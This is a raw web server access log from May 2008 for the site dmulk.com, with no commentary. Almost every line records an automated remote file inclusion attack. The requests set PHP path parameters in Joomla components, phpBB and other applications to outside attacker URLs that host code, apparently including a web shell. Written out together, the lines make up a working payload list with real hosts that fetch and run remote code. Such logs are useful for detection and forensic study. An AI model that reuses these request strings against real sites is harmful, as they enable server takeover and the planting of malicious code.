209.240.231.154 - - [24/May/2008:10:40:15 -0700] "GET //admin/admin_users.php?phpbb_root_path=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.240.231.154 - - [24/May/2008:10:40:16 -0700] "GET /logs//admin/admin_users.php?phpbb_root_path=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.182.184.148 - - [24/May/2008:10:40:30 -0700] "GET /logs/access_080312.log//components/com_lmo/lmo.php?mosConfig_absolute_path=http://admin.devilix.org/~ahmad83/download/acc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.182.184.148 - - [24/May/2008:10:40:30 -0700] "GET /logs//components/com_lmo/lmo.php?mosConfig_absolute_path=http://admin.devilix.org/~ahmad83/download/acc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.146.59.231 - - [24/May/2008:10:40:34 -0700] "GET /logs/access.log//includes/messages.inc.php?include_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.182.184.148 - - [24/May/2008:10:40:43 -0700] "GET /logs/access_080313.log//components/com_lmo/lmo.php?mosConfig_absolute_path=http://admin.devilix.org/~ahmad83/download/acc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.13.86.241 - - [24/May/2008:10:40:57 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.13.86.241 - - [24/May/2008:10:40:57 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.13.86.241 - - [24/May/2008:10:41:00 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.13.86.241 - - [24/May/2008:10:41:00 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.182.184.148 - - [24/May/2008:10:41:14 -0700] "GET /logs/access_080312.log//administrator/components/com_lmo/lmo.php?mosConfig_absolute_path=http://admin.devilix.org/~ahmad83/download/acc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.182.184.148 - - [24/May/2008:10:41:14 -0700] "GET /logs//administrator/components/com_lmo/lmo.php?mosConfig_absolute_path=http://admin.devilix.org/~ahmad83/download/acc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.182.184.148 - - [24/May/2008:10:41:29 -0700] "GET /logs/access_080313.log//administrator/components/com_lmo/lmo.php?mosConfig_absolute_path=http://admin.devilix.org/~ahmad83/download/acc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.182.184.148 - - [24/May/2008:10:41:36 -0700] "GET /logs/access_080312.log//administrator/components/com_lmo/lmo.php?mosConfig_absolute_path=http://admin.devilix.org/~ahmad83/download/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.182.184.148 - - [24/May/2008:10:41:36 -0700] "GET /logs//administrator/components/com_lmo/lmo.php?mosConfig_absolute_path=http://admin.devilix.org/~ahmad83/download/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
99.175.236.97 - - [24/May/2008:10:41:38 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://poko.as.ro/s/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
99.175.236.97 - - [24/May/2008:10:41:39 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://poko.as.ro/s/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.188.60.54 - - [24/May/2008:10:41:47 -0700] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.188.60.54 - - [24/May/2008:10:41:47 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.188.60.54 - - [24/May/2008:10:41:47 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.182.184.148 - - [24/May/2008:10:41:50 -0700] "GET /logs/access_080313.log//administrator/components/com_lmo/lmo.php?mosConfig_absolute_path=http://admin.devilix.org/~ahmad83/download/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
99.175.236.97 - - [24/May/2008:10:41:56 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://poko.as.ro/s/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
99.175.236.97 - - [24/May/2008:10:41:56 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://poko.as.ro/s/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.197.68.66 - - [24/May/2008:10:42:20 -0700] "GET /logs/access_080320.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://tutorials.fyreblade.com/cx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.34.224.134 - - [24/May/2008:10:42:45 -0700] "GET /logs/access_071219.log//includes/messages.inc.php?include_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.7.205.39 - - [24/May/2008:10:43:09 -0700] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
90.132.98.151 - - [24/May/2008:10:43:18 -0700] "GET / HTTP/1.1" 200 11602 "http://forex-trade.explainedhere.com/the-usd-grew-a-bit-as-major-indices-reflected-no-hints-for-recession/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 1.1.4322)" "dmulk.com"
83.244.130.90 - - [24/May/2008:10:43:29 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://h1.ripway.com/ulandary/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
83.244.130.90 - - [24/May/2008:10:43:30 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://h1.ripway.com/ulandary/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
69.72.215.178 - - [24/May/2008:10:43:37 -0700] "GET /logs/access_080327.log/appserv/main.php?appserv_root=http://www.buysell-local.es/uploaded/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.72.215.178 - - [24/May/2008:10:43:37 -0700] "GET /appserv/main.php?appserv_root=http://www.buysell-local.es/uploaded/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.72.215.178 - - [24/May/2008:10:43:43 -0700] "GET /logs/appserv/main.php?appserv_root=http://www.buysell-local.es/uploaded/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.30.73.117 - - [24/May/2008:10:43:48 -0700] "GET /logs/access_080218.log/joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/intestino/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.146.59.231 - - [24/May/2008:10:43:59 -0700] "GET /logs/index.php?incl=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.30.73.117 - - [24/May/2008:10:44:06 -0700] "GET /logs/access_080327.log/joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/intestino/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.146.59.231 - - [24/May/2008:10:44:08 -0700] "GET /index.php?incl=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [24/May/2008:10:44:12 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://mykonos.bargaingreece.com//components/com_log/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [24/May/2008:10:44:13 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://mykonos.bargaingreece.com//components/com_log/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.30.73.117 - - [24/May/2008:10:44:13 -0700] "GET /logs/access_080218.log/joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/intestino/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.194.33.88 - - [24/May/2008:10:44:14 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://h1.ripway.com/ulandary/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
200.30.73.117 - - [24/May/2008:10:44:20 -0700] "GET /logs/access_080327.log/joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/intestino/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.194.33.88 - - [24/May/2008:10:44:23 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://h1.ripway.com/ulandary/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
160.99.12.231 - - [24/May/2008:10:44:25 -0700] "GET /logs/access_080327.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.68.95.209 - - [24/May/2008:10:44:47 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://xotaz.t35.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
200.68.95.209 - - [24/May/2008:10:44:47 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://xotaz.t35.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
209.163.169.99 - - [24/May/2008:10:44:56 -0700] "GET /logs/access.log//includes/messages.inc.php?include_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.82.158.2 - - [24/May/2008:10:45:48 -0700] "GET /phpAdsNew/view.inc.php?phpAds_path=http://www.dito.nl/php_content/.htaccess_/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
195.82.158.2 - - [24/May/2008:10:45:48 -0700] "GET /logs/phpAdsNew/view.inc.php?phpAds_path=http://www.dito.nl/php_content/.htaccess_/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
193.54.123.192 - - [24/May/2008:10:45:54 -0700] "GET /logs///include/lib.inc.php?site_path=http://www.indicce.com/admin/r57? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.72.211.242 - - [24/May/2008:10:45:58 -0700] "GET /logs/access_071228.log/index.php?sub=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
161.58.178.229 - - [24/May/2008:10:45:59 -0700] "GET /logs/access_080124.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.55.174.114 - - [24/May/2008:10:46:00 -0700] "GET /logs/access_071219.log/inc/cmses/aedatingCMS.php?dir[inc]=http://hist.hongik.ac.kr/zb4pl6/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
72.55.174.114 - - [24/May/2008:10:46:01 -0700] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://hist.hongik.ac.kr/zb4pl6/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
72.55.174.114 - - [24/May/2008:10:46:01 -0700] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://hist.hongik.ac.kr/zb4pl6/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
69.72.211.242 - - [24/May/2008:10:46:03 -0700] "GET /logs/index.php?sub=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.163.169.99 - - [24/May/2008:10:46:04 -0700] "GET /logs/access.log/index.php?incl=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.72.211.242 - - [24/May/2008:10:46:04 -0700] "GET /index.php?sub=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
85.214.59.130 - - [24/May/2008:10:46:26 -0700] "GET ///addpost_newpoll.php?addpoll=preview&thispath=http://?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.59.130 - - [24/May/2008:10:46:28 -0700] "GET ///addpost_newpoll.php?addpoll=preview&thispath=http://?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.80.107.90 - - [24/May/2008:10:46:30 -0700] "GET /logs/access_080218.log//admin/admin_users.php?phpbb_root_path=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.80.107.90 - - [24/May/2008:10:46:31 -0700] "GET //admin/admin_users.php?phpbb_root_path=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.80.107.90 - - [24/May/2008:10:46:31 -0700] "GET /logs//admin/admin_users.php?phpbb_root_path=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.56.80 - - [24/May/2008:10:46:33 -0700] "GET /logs/access_080117.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
79.115.26.66 - - [24/May/2008:10:46:40 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.dito.nl/php_content/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.163.169.99 - - [24/May/2008:10:47:07 -0700] "GET /logs/access_080212.log/index.php?incl=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.221.130.12 - - [24/May/2008:10:47:15 -0700] "GET /logs/access_080215.log/amember/plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://www.gameheros.org/WebAdmin/phpmailer/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.12 - - [24/May/2008:10:47:15 -0700] "GET /logs/amember/plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://www.gameheros.org/WebAdmin/phpmailer/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.58.181.74 - - [24/May/2008:10:47:16 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
161.58.178.229 - - [24/May/2008:10:47:25 -0700] "GET /logs/access_080119.log//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
161.58.178.229 - - [24/May/2008:10:47:26 -0700] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.115.26.66 - - [24/May/2008:10:47:44 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.dito.nl/php_content/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
79.115.26.66 - - [24/May/2008:10:47:44 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.dito.nl/php_content/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
79.115.26.66 - - [24/May/2008:10:47:44 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.dito.nl/php_content/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.146.59.231 - - [24/May/2008:10:47:57 -0700] "GET /logs/access.log/index.php?incl=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.198.60.199 - - [24/May/2008:10:48:18 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.hssilva.net/ess//claroline/tracking/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
88.198.60.199 - - [24/May/2008:10:48:19 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.hssilva.net/ess//claroline/tracking/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
88.198.60.199 - - [24/May/2008:10:48:19 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.hssilva.net/ess//claroline/tracking/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
82.146.59.231 - - [24/May/2008:10:48:20 -0700] "GET /logs/access_080212.log/index.php?incl=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.163.169.99 - - [24/May/2008:10:49:25 -0700] "GET /logs/index.php?incl=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.218.137.79 - - [24/May/2008:10:49:33 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://coprald.sitesled.com/mura??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.218.137.79 - - [24/May/2008:10:49:33 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://coprald.sitesled.com/mura??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.163.169.99 - - [24/May/2008:10:49:33 -0700] "GET /index.php?incl=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
195.82.158.2 - - [24/May/2008:10:49:48 -0700] "GET /logs//nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.dito.nl/php_content/.htaccess_/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
195.82.158.2 - - [24/May/2008:10:49:49 -0700] "GET //nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.dito.nl/php_content/.htaccess_/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
209.62.80.134 - - [24/May/2008:10:49:59 -0700] "GET /logs/index.phpmain.php?x=http://justbarelylegal.com/ct/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
83.17.61.114 - - [24/May/2008:10:50:04 -0700] "GET /logs/access_080112.log//tools/send_reminders.php?noSet=0&includedir=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.80.134 - - [24/May/2008:10:50:06 -0700] "GET /index.phpmain.php?x=http://justbarelylegal.com/ct/test.txt? HTTP/1.1" 404 5001 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
83.17.61.114 - - [24/May/2008:10:50:07 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.17.61.114 - - [24/May/2008:10:50:12 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.178.229 - - [24/May/2008:10:50:18 -0700] "GET /logs/access_080120.log//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.59.130 - - [24/May/2008:10:50:18 -0700] "GET //trans/trans.php?trans=ko&page=http://www.partymax24.de/components/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
85.214.59.130 - - [24/May/2008:10:50:19 -0700] "GET /logs//trans/trans.php?trans=ko&page=http://www.partymax24.de/components/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
77.221.130.12 - - [24/May/2008:10:50:27 -0700] "GET /logs/access_080125.log/amember/plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://www.gameheros.org/WebAdmin/phpmailer/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.249.155.6 - - [24/May/2008:10:50:58 -0700] "GET /index.php3?lang=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.72.211.242 - - [24/May/2008:10:51:00 -0700] "GET /logs/access_080218.log/index.php?sub=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
63.134.253.108 - - [24/May/2008:10:51:18 -0700] "GET /logs/access_071224.log//error.php?dir=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.134.253.108 - - [24/May/2008:10:51:19 -0700] "GET //error.php?dir=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.134.253.108 - - [24/May/2008:10:51:19 -0700] "GET /logs//error.php?dir=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.134.253.108 - - [24/May/2008:10:51:39 -0700] "GET /logs/access_080211.log//error.php?dir=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.111.178 - - [24/May/2008:10:52:02 -0700] "GET /logs/access_080113.log/errors.php?error=http://kclarkes.t35.com/cd/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.111.178 - - [24/May/2008:10:52:03 -0700] "GET /errors.php?error=http://kclarkes.t35.com/cd/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.111.178 - - [24/May/2008:10:52:03 -0700] "GET /logs/errors.php?error=http://kclarkes.t35.com/cd/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.111.178 - - [24/May/2008:10:52:15 -0700] "GET /logs/access_080122.log/errors.php?error=http://kclarkes.t35.com/cd/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.181.74 - - [24/May/2008:10:52:38 -0700] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.36.252.34 - - [24/May/2008:10:52:52 -0700] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://skill-station.net/help/id.txt?t?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.36.252.34 - - [24/May/2008:10:52:52 -0700] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://skill-station.net/help/id.txt?t?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
83.17.61.114 - - [24/May/2008:10:52:56 -0700] "GET /logs/access_080104.log//tools/send_reminders.php?noSet=0&includedir=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:10:53:03 -0700] "GET /logs/access_080201.log//index2.php?mosConfig_live_site=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:10:53:03 -0700] "GET //index2.php?mosConfig_live_site=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:10:53:04 -0700] "GET /logs//index2.php?mosConfig_live_site=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.36.252.34 - - [24/May/2008:10:53:34 -0700] "GET /logs/access_080128.log/skins/advanced/advanced1.php?pluginpath[0]=http://skill-station.net/help/id.txt?t?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.36.252.34 - - [24/May/2008:10:53:34 -0700] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://skill-station.net/help/id.txt?t?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.36.252.34 - - [24/May/2008:10:53:34 -0700] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://skill-station.net/help/id.txt?t?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.36.252.34 - - [24/May/2008:10:53:35 -0700] "GET /logs/access_080131.log/skins/advanced/advanced1.php?pluginpath[0]=http://skill-station.net/help/id.txt?t?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
88.198.60.199 - - [24/May/2008:10:53:37 -0700] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.hssilva.net/ess//claroline/tracking/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.163.169.99 - - [24/May/2008:10:53:44 -0700] "GET /logs/access.log/index.php?incl=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:10:53:50 -0700] "GET /logs/access.log//index2.php?mosConfig_live_site=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
